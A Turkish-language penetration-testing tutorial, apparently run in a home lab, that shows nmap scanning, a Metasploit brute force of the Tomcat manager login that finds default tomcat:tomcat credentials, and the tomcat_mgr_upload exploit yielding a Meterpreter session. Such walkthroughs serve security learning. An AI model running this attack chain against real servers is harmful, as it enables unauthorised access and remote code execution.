Apache Tomcat Nedir?
Apache Tomcat: Java Server Pages (JSP) sayfalarının çalışması işlevini gören bir server denilebilir.
Default olarak TCP 8080 port’unu kullanmaktadır.
http protokol’ünü kullanan tomcat servisine brute-force gerçekleştirerek erişim elde etmeyi göstereceğim
msf çatısı altında brute force işlemi gerçekleştirip, meterpreter oturumu alacağım.
brute force modülü: auxiliary/scanner/http/tomcat_mgr_login
upload modülü: exploit/multi/http/tomcat_mgr_upload
Adım 1: Port Taraması
"ifconfig" komutuyla yerel ip adresimi öğreniyorum. -192.168.1.38-
"nmap" yazılımını "-sP" parametresiyle, ağımda ip taraması yapıyorum. -192.168.1.0/24-
Hedef Sistemin "192.168.1.39" ip adresine sahip olduğunu öğreniyorum.
"nmap" yazılımını "-sV,-O,-p" parametreleriyle hedef sistemde port taraması yapıyorum.
-sV : versiyon bilgisini verir.
-O : işletim sistemi bilgisini verir.
-p- : tüm portların taranacağı anlamına gelir.
8180 port’u tomcat’in kullandığını öğreniyorum.
IP Adres: 192.168.1.39
Port: 8180
Servis: http
Versiyon: Tomcat
Adım 2: Exploit Arama
metasploit’in hatasız çalışması için postgresql servisini başlatıyorum.
"msfconsole -q" : metasploit’i banner’sız çalıştırıyorum.
"search tomcat" : tomcat ile alakalı müdlleri aratıyorum.
"use auxiliary/scanner/http/tomcat_mgr_login" : brute-force gerçekleştirecek modülün içine giriyorum.
"show options" : modülün ayalarını görüyorum.
KULLANILAN MODÜL : auxiliary/scanner/http/tomcat_mgr_login
"set RHOSTS" : hedef IP adresini veriyorum.
"set RPORT" : tomcat’in kullandığı port’u veriyorum.
"run" : modülü çalıştırıyorum.
ve puf ! brute force başarılı, tomcat:tomcat ile giriş yapılabiliyormuş. -default-
Adım 3: Exploit Kullanımı
KULLANILAN MODÜL : exploit/multi/http/tomcat_mgr_upload
"set HttpUsername" : tomcat username bilgisini veriyorum.
"set HttpPassword" : tomcat password bilgisini veriyorum.
"exploit" : exploit işlemini başlatıyorum.
ve meterpreter oturumu geldi.
